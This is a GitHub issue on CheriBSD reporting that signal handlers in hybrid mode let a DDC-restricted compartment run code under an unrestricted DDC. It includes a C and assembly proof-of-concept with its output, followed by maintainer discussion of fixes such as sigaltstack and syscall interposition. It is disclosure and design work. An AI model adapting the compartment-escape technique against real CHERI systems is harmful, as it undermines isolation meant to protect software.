Signal handlers in hybrid mode can be used to bypass the DDC

ltratt commented 2 years ago

[This report was done in conjunction with @0152la and @jacobbramley]

In CheriBSD hybrid mode (presumably a variant of this can also happen in purecap mode, but I haven’t checked), a nefarious compartment can use signal handlers to run code under a different DDC than the one in effect when the handler was registered.

The following code shows the problem (much of this is boilerplate; restrict_and_check() is the main part of interest):

#include <cheriintrin.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#if defined(__CHERI_PURE_CAPABILITY__) || !__has_feature(capabilities)
#  error This example must be run on a CHERI hybrid system
#endif

// This example shows that registering a signal handler allows a DDC-restricted
// compartment to break out of itself: the signal handler is run with whatever
// DDC is present at the time the handler is run, which can be different than
// the DDC the handler was registered with.

#define STACK_LEN 4096

void ddc_set(void *__capability cap) {
    asm volatile("MSR DDC, %[cap]" : : [cap] "C"(cap) : "memory");
}

void handler(int sig) {
    printf("DDC in signal handler: %#lp\n", cheri_ddc_get());
}

void restrict_and_check() {
    pid_t self_pid = getpid();

    void *__capability old_ddc = cheri_ddc_get();
    // The new DDC's bounds will be `0..__builtin_frame_address(0)`.
    void *__capability new_ddc = cheri_bounds_set(cheri_ddc_get(), (vaddr_t) __builtin_frame_address(0));
    printf("Will restrict DDC to: %#lp\n", new_ddc);
    // Restrict the DDC (i.e. move into a restricted compartment).
    ddc_set(new_ddc);
    // Register a signal handler while in the restricted compartment.
    signal(SIGHUP, handler);
    // If a signal is received now, the handler will be run under the restricted DDC...
    kill(self_pid, SIGHUP);
    // ...but if we now restore the DDC to its unrestricted value...
    ddc_set(old_ddc);
    // ...then the handler will be run with the unrestricted DDC, breaking out
    // of the compartment the handler was registered under.
    kill(self_pid, SIGHUP);
}

void call_with_stack(void (*fn)(), void* stack);
asm(".type call_with_stack, @function\n"
    "call_with_stack:\n"
    "    MOV x10, sp\n"
    "    BIC sp, x1, 0xf\n" // Ensure 16-byte stack alignment.
    // Save the return address and old stack, so we can get back.
    "    STP x10, lr, [sp, #-16]!\n"
    // We've now switched to a new stack. We must restore it before the end
    // of the assembly block, because the C compiler is likely to generate
    // stack accesses to access locals. We can, however, call out to another
    // C function, since it shouldn't make any assumptions about its stack
    // on entry and will work in blissful ignorance that it's not on the
    // same stack as the calling function.
    //
    // We've broken an AAPCS64 rule here because we've escaped the stack
    // limit, but in practice this works fine for demonstration purposes.
    "    BLR x0\n"
    // Restore the stack and return.
    "    LDP x10, lr, [sp]\n"
    "    MOV sp, x10\n"
    "    RET lr\n");

int main() {
    // The default DDC in CheriBSD spans the entirety of virtual memory, and
    // CheriBSD puts the stack at such a high virtual address that it's
    // difficult to restrict the DDC while still covering both the stack and
    // whatever memory library calls like signal() need. To make our lives
    // easier we allocate a new stack, which CheriBSD will place at a
    // relatively low virtual memory address, and restrict the DDC to
    // encompass virtual memory up to that address.
    char *stack_base = malloc(STACK_LEN);
    if (stack_base == NULL) {
        perror("malloc");
        return 1;
    }
    // Stacks grow downwards, so pass the top of the allocation.
    void *new_stack = stack_base + STACK_LEN;
    call_with_stack(restrict_and_check, new_stack);

    return 0;
}

When run this prints out:

Will restrict DDC to: 0x0 [rwRW,0x0-0x41800000]
DDC in signal handler: 0x0 [rwRW,0x0-0x41800000]
DDC in signal handler: 0x0 [rwRW,0x0-0x1000000000000]

As this shows, the first invocation of the signal handler is executed with the restricted DDC, and the second invocation with the unrestricted DDC. In essence, the signal handler has allowed the restricted compartment access to the unrestricted compartment. Using more general terminology, a signal handler can be used to gain access to a different set of permissions to that in play when the handler was registered.

The “obvious” fix is that registering a signal handler with signal() should record the DDC at registration time and restore that before the kernel invokes the signal handler. However, each DDC compartment will have its own stack, and no ABI I know of allows a user-space DDC compartment to record the stack at the point that the DDC value is changed. Thus, switching the DDC cannot be guaranteed to restore the stack pointer to the correct place. Changing the ABI to record the stack pointer on a DDC-switch would be very difficult and is probably impractical (if nothing else, how would the user atomically change the DDC and record the stack pointer?).

One approach is to only deliver signals to a thread if its current DDC is the same as when the signal was registered. I’m not keen on this: signals may end up never being delivered, which will cause a debugging nightmare.

Fortunately, I think we can make use of the existing sigaltstack() call, which allows a process to designate a given portion of memory as the stack for signal handlers. As well as recording the DDC at the point that a signal handler is registered, signal() should fail (probably returning SIG_ERR and setting errno to the seemingly generic EINVAL?) if an alternative signal stack has not been registered. Clearly this is not fully compatible with existing code, which rarely calls sigaltstack(). One could safely loosen the restriction so that if the DDC at the point signal() is called is the “default” DDC, no alternative signal stack needs to have been registered.
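A minimal user-space sketch of the check described above, in portable POSIX C rather than CheriBSD kernel code. The name signal_requiring_altstack() is hypothetical and not an existing API, it returns -1 rather than SIG_ERR for simplicity, and it omits the DDC recording and the "default DDC" relaxation; it only shows how the "no alternate stack registered" case could be detected and rejected with EINVAL.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <errno.h>
#include <signal.h>
#include <stddef.h>

// Hypothetical wrapper (not a CheriBSD API): installs `fn` for `sig` only if
// the calling thread has already registered an alternate signal stack.
// Returns 0 on success, or -1 with errno set (EINVAL if no stack is set).
int signal_requiring_altstack(int sig, void (*fn)(int)) {
    assert(sig > 0);

    stack_t current;
    // Passing NULL as the new stack only queries the current setting.
    if (sigaltstack(NULL, &current) != 0)
        return -1;
    if (current.ss_flags & SS_DISABLE) {
        errno = EINVAL; // No alternate signal stack has been registered.
        return -1;
    }

    struct sigaction sa;
    sa.sa_handler = fn;
    sa.sa_flags = SA_ONSTACK; // Run the handler on the alternate stack.
    sigemptyset(&sa.sa_mask);
    return sigaction(sig, &sa, NULL);
}
```

A compartment manager would call sigaltstack() with memory inside the compartment before letting the compartment register handlers; the wrapper then refuses registrations made without that setup.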

[Although I don’t think the following is directly related, in the sense that there’s nothing OS libraries or the kernel can do about it, it’s worth noting. Signal handlers are not deleted when a DDC compartment is removed, so a stale handler could still be invoked when a new DDC compartment happens to overlap in virtual memory with an old DDC compartment. A “good” DDC compartment manager will thus, in general, need to delete signal handlers that reside within a given DDC compartment when that compartment is deleted.]
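One way a compartment manager might do that clean-up is sketched below in portable POSIX C. The helper reset_handlers_in_range(), the probe bound MAX_SIGNAL_PROBE, and the stand-in compartment_handler() are all hypothetical names for illustration; the sketch assumes a compartment's code occupies one contiguous address range and that handler function pointers can be compared as integers.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <signal.h>
#include <stddef.h>
#include <stdint.h>

// Assumed upper bound on signal numbers to probe; numbers the system rejects
// are simply skipped.
#define MAX_SIGNAL_PROBE 128

// Stand-in for a handler whose code lives inside a compartment.
void compartment_handler(int sig) { (void)sig; }

// Hypothetical helper: resets to SIG_DFL every handler whose code address
// lies in [base, base + len). Returns the number of handlers reset.
int reset_handlers_in_range(uintptr_t base, size_t len) {
    assert(len > 0);
    int reset = 0;
    for (int sig = 1; sig < MAX_SIGNAL_PROBE; sig++) {
        struct sigaction sa;
        if (sigaction(sig, NULL, &sa) != 0)
            continue; // Not a signal number this system accepts.
        uintptr_t addr = (sa.sa_flags & SA_SIGINFO)
                             ? (uintptr_t)sa.sa_sigaction
                             : (uintptr_t)sa.sa_handler;
        // SIG_DFL and SIG_IGN are sentinel values, not real handler code.
        if (addr == (uintptr_t)SIG_DFL || addr == (uintptr_t)SIG_IGN)
            continue;
        if (addr < base || addr - base >= len)
            continue; // Handler lives outside the compartment.
        struct sigaction dfl;
        dfl.sa_handler = SIG_DFL;
        dfl.sa_flags = 0;
        sigemptyset(&dfl.sa_mask);
        if (sigaction(sig, &dfl, NULL) == 0)
            reset++;
    }
    return reset;
}
```

Scanning the process-wide dispositions avoids keeping a separate registry, at the cost of trusting that no handler outside the compartment shares its address range.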

jrtc27 commented 2 years ago

Our general belief is that compartments cannot safely be given raw access to system calls. Signal configuration is a shared process-wide resource, so it must be interposed, with the interposing code acting as a trusted intermediary that can therefore run with the full DDC (and, in the case of Morello, in executive; but none of CheriBSD is currently designed to support the Morello-specific restricted mode, and we make zero security claims, or even functionality ones, beyond it not being a side-channel between processes). There is no way that I know of to do it safely and robustly otherwise.
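To make the interposition idea concrete, here is a rough sketch in portable C, not CheriBSD's or anyone's actual design. Compartments are modelled as plain integer IDs, and assigning to current_compartment stands in for the real switch of DDC and stack; interposed_signal(), trusted_dispatch(), record_compartment() and MAX_SIG are all hypothetical names.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <signal.h>
#include <stddef.h>

#define MAX_SIG 64 // Assumed table size for this sketch.

// Stand-in for "which DDC and stack are live"; 0 means the trusted runtime.
volatile sig_atomic_t current_compartment = 0;
volatile sig_atomic_t seen_compartment = 0;

struct slot {
    int owner;        // Compartment that registered the handler.
    void (*fn)(int);  // The compartment's handler, or NULL if none.
};
static struct slot slots[MAX_SIG];

// The only handler the kernel ever sees. It runs as trusted code, switches to
// the owning compartment, calls its handler, then switches back.
static void trusted_dispatch(int sig) {
    struct slot s = slots[sig];
    if (s.fn == NULL)
        return;
    sig_atomic_t interrupted = current_compartment;
    current_compartment = s.owner; // Stand-in for restoring DDC and stack.
    s.fn(sig);
    current_compartment = interrupted;
}

// Hypothetical trusted entry point compartments call instead of signal().
int interposed_signal(int owner, int sig, void (*fn)(int)) {
    assert(owner > 0);
    if (sig <= 0 || sig >= MAX_SIG)
        return -1;
    slots[sig].owner = owner;
    slots[sig].fn = fn;
    struct sigaction sa;
    sa.sa_handler = trusted_dispatch;
    sa.sa_flags = 0;
    sigemptyset(&sa.sa_mask);
    return sigaction(sig, &sa, NULL);
}

// Example compartment handler: records which compartment it ran under.
void record_compartment(int sig) {
    (void)sig;
    seen_compartment = current_compartment;
}
```

With this shape, the handler always runs under the compartment that registered it, regardless of which compartment was interrupted; a real implementation would also need to make the table update and the sigaction() call atomic with respect to signal delivery.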

Also, you need an alternate signal stack anyway if you want safety; otherwise, compartments can poke at earlier stack frames to extract capabilities to other compartments.

jacobbramley commented 2 years ago

Ah-ha, and it looks like we can use CHERI_PERM_SYSCALL to experiment with that in CheriBSD.

I think a distinct stack region is usually required for the same reason that it is required when switching compartments in general. sigaltstack() is a good way to get the kernel to go along with whatever stack policy the compartments rely upon. Here's a thought, though: you could use the same stack region but give a bounded stack pointer to enforce separation. It would require cleaning of memory on entry and exit but could act as a fallback for compatibility with code that doesn't use sigaltstack(). This could probably be used as a deployment path, at least.

rwatson commented 2 years ago

I’m not sure if you’ve looked at our 2015 paper on in-process compartmentalisation, but it touches on some of these topics -- and our implementation at the time had rather more to say about signal stacks, etc.

https://www.cl.cam.ac.uk/research/security/ctsrd/pdfs/201505-oakland2015-cheri-compartmentalization.pdf

Since then we’ve been primarily focused on co-process compartmentalisation, which doesn’t require detailing fine-grained compartmentalisation within processes. But we also have ongoing work on a run-time-linker-based model that is turning our attention back to that general investigation.

ltratt commented 2 years ago

@jacobbramley

> Here's a thought, though: you could use the same stack region but give a bounded stack pointer to enforce separation.

I think this would end up functionally equivalent to the compartment manager/creator code calling sigaltstack() when a compartment is created?

@rwatson

> But we also have ongoing work on a run-time-linker-based model that is turning our attention back to that general investigation.

Is there anything you can point us at? We're all ears :)

CTSRD-CHERI / cheribsd

Signal handlers in hybrid mode can be used to bypass the DDC #1315